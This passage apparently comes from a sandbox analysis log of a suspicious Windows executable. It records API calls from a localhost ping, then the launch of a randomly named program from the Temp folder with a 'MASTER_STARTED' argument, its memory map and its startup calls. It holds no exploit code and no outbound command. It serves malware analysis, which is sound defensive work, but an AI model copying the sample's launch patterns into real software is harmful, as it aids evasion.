_setmode (_FileHandle=1, _Mode=32768) returned 16384 [0097.350] _write (in: _FileHandle=1, _Buf=0x3e4858*, _MaxCharCount=0x18 | out: _Buf=0x3e4858*) returned 24 [0097.353] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0097.353] LocalFree (hMem=0x3e4858) returned 0x0 [0097.353] SetConsoleCtrlHandler (HandlerRoutine=0x1c17ca, Add=1) returned 1 [0097.353] Icmp6SendEcho2 (in: IcmpHandle=0x3e8b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x22f758, DestinationAddress=0x1c55e0, RequestData=0x3e4830, RequestSize=0x20, RequestOptions=0x22f708, ReplyBuffer=0x3eebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x3eebb0) returned 0x1 [0097.408] getnameinfo (in: pSockaddr=0x1c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x22fbdc, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0097.408] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x22f6e0, nSize=0x0, Arguments=0x22f6dc | out: lpBuffer=" Q>") returned 0x10 [0097.408] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x3e5120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0097.408] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0097.409] _write (in: _FileHandle=1, _Buf=0x3e5120*, _MaxCharCount=0x10 | out: _Buf=0x3e5120*) returned 16 [0097.409] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0097.409] LocalFree (hMem=0x3e5120) returned 0x0 [0097.409] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x22f6e4, nSize=0x0, Arguments=0x22f6e0 | out: lpBuffer="\x10<>") returned 0x9 [0097.409] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x3e3c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0097.409] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0097.409] _write (in: _FileHandle=1, _Buf=0x3e3c10*, _MaxCharCount=0x9 | out: _Buf=0x3e3c10*) returned 9 [0097.409] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0097.409] LocalFree (hMem=0x3e3c10) returned 0x0 [0097.409] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x22f6e4, nSize=0x0, Arguments=0x22f6e0 | out: lpBuffer=" \x8f>") returned 0x2 [0097.409] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x3e8f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0097.409] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0097.409] _write (in: _FileHandle=1, _Buf=0x3e8f20*, _MaxCharCount=0x2 | out: _Buf=0x3e8f20*) returned 2 [0097.410] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0097.410] LocalFree (hMem=0x3e8f20) returned 0x0 [0097.410] Sleep (dwMilliseconds=0x3e8) [0098.415] Icmp6SendEcho2 (in: IcmpHandle=0x3e8b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x22f758, DestinationAddress=0x1c55e0, RequestData=0x3e4830, RequestSize=0x20, RequestOptions=0x22f708, ReplyBuffer=0x3eebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x3eebb0) returned 0x1 [0098.675] getnameinfo (in: pSockaddr=0x1c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x22fbdc, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0098.675] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x22f6e0, nSize=0x0, Arguments=0x22f6dc | out: lpBuffer=" Q>") returned 0x10 [0098.675] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x3e5120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0098.675] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0098.675] _write (in: _FileHandle=1, _Buf=0x3e5120*, _MaxCharCount=0x10 | out: _Buf=0x3e5120*) returned 16 [0098.675] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0098.675] LocalFree (hMem=0x3e5120) returned 0x0 [0098.675] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x22f6e4, nSize=0x0, Arguments=0x22f6e0 | out: lpBuffer="\x10<>") returned 0x9 [0098.675] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x3e3c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0098.675] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0098.675] _write (in: _FileHandle=1, _Buf=0x3e3c10*, _MaxCharCount=0x9 | out: _Buf=0x3e3c10*) returned 9 [0098.676] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0098.676] LocalFree (hMem=0x3e3c10) returned 0x0 [0098.676] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x22f6e4, nSize=0x0, Arguments=0x22f6e0 | out: lpBuffer=" \x8f>") returned 0x2 [0098.676] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x3e8f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0098.676] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0098.676] _write (in: _FileHandle=1, _Buf=0x3e8f20*, _MaxCharCount=0x2 | out: _Buf=0x3e8f20*) returned 2 [0098.676] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0098.676] LocalFree (hMem=0x3e8f20) returned 0x0 [0098.676] Sleep (dwMilliseconds=0x3e8) [0099.854] Icmp6SendEcho2 (in: IcmpHandle=0x3e8b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x22f758, DestinationAddress=0x1c55e0, RequestData=0x3e4830, RequestSize=0x20, RequestOptions=0x22f708, ReplyBuffer=0x3eebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x3eebb0) returned 0x1 [0100.097] getnameinfo (in: pSockaddr=0x1c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x22fbdc, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0100.098] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x22f6e0, nSize=0x0, Arguments=0x22f6dc | out: lpBuffer=" Q>") returned 0x10 [0100.098] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x3e5120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0100.098] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0100.098] _write (in: _FileHandle=1, _Buf=0x3e5120*, _MaxCharCount=0x10 | out: _Buf=0x3e5120*) returned 16 [0100.098] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0100.098] LocalFree (hMem=0x3e5120) returned 0x0 [0100.098] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x22f6e4, nSize=0x0, Arguments=0x22f6e0 | out: lpBuffer="\x10<>") returned 0x9 [0100.098] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x3e3c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0100.098] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0100.098] _write (in: _FileHandle=1, _Buf=0x3e3c10*, _MaxCharCount=0x9 | out: _Buf=0x3e3c10*) returned 9 [0100.098] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0100.098] LocalFree (hMem=0x3e3c10) returned 0x0 [0100.098] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x22f6e4, nSize=0x0, Arguments=0x22f6e0 | out: lpBuffer=" \x8f>") returned 0x2 [0100.098] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x3e8f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0100.099] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0100.099] _write (in: _FileHandle=1, _Buf=0x3e8f20*, _MaxCharCount=0x2 | out: _Buf=0x3e8f20*) returned 2 [0100.099] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0100.099] LocalFree (hMem=0x3e8f20) returned 0x0 [0100.099] getnameinfo (in: pSockaddr=0x1c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x22f6a8, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0100.099] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0x22f678, nSize=0x0, Arguments=0x22f674 | out: lpBuffer="\xd0\x0c\x3f") returned 0x56 [0100.099] CharToOemBuffA (in: lpszSrc="\r\nPing statistics for ::1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpszDst=0x3f0cd0, cchDstLength=0x56 | out: lpszDst="\r\nPing statistics for ::1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n") returned 1 [0100.099] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0100.099] _write (in: _FileHandle=1, _Buf=0x3f0cd0*, _MaxCharCount=0x56 | out: _Buf=0x3f0cd0*) returned 86 [0100.100] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0100.100] LocalFree (hMem=0x3f0cd0) returned 0x0 [0100.100] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0x22f688, nSize=0x0, Arguments=0x22f684 | out: lpBuffer="\xe8\x0c\x3f") returned 0x61 [0100.100] CharToOemBuffA (in: lpszSrc="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpszDst=0x3f0ce8, cchDstLength=0x61 | out: lpszDst="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n") returned 1 [0100.100] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0100.100] _write (in: _FileHandle=1, _Buf=0x3f0ce8*, _MaxCharCount=0x61 | out: _Buf=0x3f0ce8*) returned 97 [0100.100] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0100.100] LocalFree (hMem=0x3f0ce8) returned 0x0 [0100.100] IcmpCloseHandle (IcmpHandle=0x3e8b40) returned 1 [0100.242] LocalFree (hMem=0x3e4830) returned 0x0 [0100.242] LocalFree (hMem=0x3eebb0) returned 0x0 [0100.242] WSACleanup () returned 0 [0100.469] exit (_Code=0) Thread: id = 19 os_tid = 0xb70 Thread: id = 22 os_tid = 0xb90 Thread: id = 23 os_tid = 0xb9c Process: id = "14" image_name = "nhsgkr2p.exe" filename = "c:\\users\\eebsym5\\appdata\\local\\temp\\nhsgkr2p.exe" page_root = "0x7ea16800" os_pid = "0xb4c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0xad4" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 868 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 869 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 870 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 871 start_va = 0x400000 end_va = 0x481fff entry_point = 0x400000 region_type = mapped_file name = "nhsgkr2p.exe" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\nhsgkr2p.exe") Region: id = 872 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 873 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 874 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 875 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 876 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 877 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 878 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 879 start_va = 0x2a0000 end_va = 0x306fff entry_point = 0x2a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 880 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 881 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 882 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 883 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 884 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 885 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 886 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 887 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 888 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 890 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 891 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 892 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 893 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 894 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 895 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 896 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 897 start_va = 0x11a0000 end_va = 0x125ffff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 1047 start_va = 0x741e0000 end_va = 0x7421ffff entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1048 start_va = 0x11a0000 end_va = 0x121ffff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 1049 start_va = 0x1250000 end_va = 0x125ffff entry_point = 0x0 region_type = private name = "private_0x0000000001250000" filename = "" Region: id = 1074 start_va = 0x1260000 end_va = 0x133efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001260000" filename = "" Region: id = 1075 start_va = 0x73eb0000 end_va = 0x73ec2fff entry_point = 0x73eb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 1076 start_va = 0x150000 end_va = 0x152fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1077 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Thread: id = 15 os_tid = 0xb50 [0095.295] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12ff7c | out: lpSystemTimeAsFileTime=0x12ff7c*(dwLowDateTime=0x77526c00, dwHighDateTime=0x1d440a9)) [0095.295] GetCurrentProcessId () returned 0xb4c [0095.295] GetCurrentThreadId () returned 0xb50 [0095.295] GetTickCount () returned 0x22f3a [0095.295] QueryPerformanceCounter (in: lpPerformanceCount=0x12ff74 | out: lpPerformanceCount=0x12ff74*=15208387719) returned 1 [0095.295] GetStartupInfoW (in: lpStartupInfo=0x12ff20 | out: lpStartupInfo=0x12ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x12ff84, hStdError=0x405b06)) [0095.295] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0095.296] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0095.296] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x7696418d [0095.296] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x76961e16 [0095.296] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769676e6 [0095.296] GetProcAddress (hModule=0x76910000, lpProcName="FlsFree") returned 0x76961f61 [0095.297] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0095.297] GetCurrentThreadId () returned 0xb50 [0095.297] GetStartupInfoW (in: lpStartupInfo=0x12febc | out: lpStartupInfo=0x12febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x405699, hStdOutput=0x405a4c, hStdError=0x12507d0)) [0095.298] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0095.298] GetFileType (hFile=0x3) returned 0x0 [0095.298] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0095.298] GetFileType (hFile=0x7) returned 0x0 [0095.298] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0095.298] GetFileType (hFile=0xb) returned 0x0 [0095.298] SetHandleCount (uNumber=0x20) returned 0x20 [0095.298] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"" [0095.298] GetEnvironmentStringsW () returned 0x1afc98* [0095.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1033 [0095.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x12511f8, cbMultiByte=1033, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=C:=C:\\Users\\EEBsYm5\\Desktop", lpUsedDefaultChar=0x0) returned 1033 [0095.298] FreeEnvironmentStringsW (penv=0x1afc98) returned 1 [0095.298] GetLastError () returned 0x6 [0095.298] SetLastError (dwErrCode=0x6) [0095.298] GetLastError () returned 0x6 [0095.298] SetLastError (dwErrCode=0x6) [0095.298] GetLastError () returned 0x6 [0095.298] SetLastError (dwErrCode=0x6) [0095.298] GetACP () returned 0x4e4 [0095.298] GetLastError () returned 0x6 [0095.298] SetLastError (dwErrCode=0x6) [0095.298] IsValidCodePage (CodePage=0x4e4) returned 1 [0095.299] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fe84 | out: lpCPInfo=0x12fe84) returned 1 [0095.299] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12f950 | out: lpCPInfo=0x12f950) returned 1 [0095.299] GetLastError () returned 0x6 [0095.299] SetLastError (dwErrCode=0x6) [0095.299] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0095.299] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0095.299] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x12f964 | out: lpCharType=0x12f964) returned 1 [0095.299] GetLastError () returned 0x6 [0095.299] SetLastError (dwErrCode=0x6) [0095.299] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0095.299] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿƂﳺശAĀ") returned 256 [0095.300] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿƂﳺശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0095.300] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ 